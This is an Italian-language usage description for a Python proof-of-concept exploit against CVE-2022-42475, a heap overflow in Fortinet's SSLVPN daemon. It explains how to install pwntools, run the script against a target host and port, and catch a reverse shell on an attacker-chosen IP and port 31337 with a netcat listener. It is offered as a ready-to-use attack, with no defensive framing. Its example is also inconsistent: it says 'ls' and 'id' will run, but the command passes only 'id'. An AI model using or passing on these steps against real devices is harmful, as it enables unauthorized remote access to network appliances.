
Exploit Python per l'heap overflow CVE-2022-42475 nel demone SSLVPN di Fortinet. Consegna una reverse shell tramite pwntools con target, porta e comandi personalizzabili.
Codice POC per sfruttare l'overflow dell'heap nel demone SSLVPN di Fortinet
pip install pwntools Per usare questo codice, puoi salvarlo in un file, ad esempio exploit.py, e poi eseguirlo con Python dalla riga di comando, passando gli argomenti richiesti. Ecco un comando di esempio per eseguire l'exploit:
python exploit.py <target_host> <target_port> <reverse_ip>
Sostituisci <target_host> con il nome host o l'indirizzo IP del sistema target, <target_port> con il numero di porta del servizio vulnerabile e <reverse_ip> con l'indirizzo IP della macchina su cui vuoi ricevere una shell. Gli argomenti rimanenti sono i comandi che vuoi eseguire, separati da spazi.
Ad esempio, se il sistema target ha l'indirizzo IP 192.168.0.100, il servizio vulnerabile è in ascolto sulla porta 8080 e vuoi eseguire i comandi ls e id, dovresti eseguire il seguente comando:
python exploit.py 192.168.0.100 8080 192.168.0.101 id
Questo creerà una connessione di shell inversa verso 192.168.0.101:31337 ed eseguirà i comandi ls e id sul sistema target. Nota che dovrai avere un listener in ascolto sull'indirizzo IP e sulla porta specificati per ricevere la shell inversa. Puoi usare strumenti come ncat o netcat per creare un listener.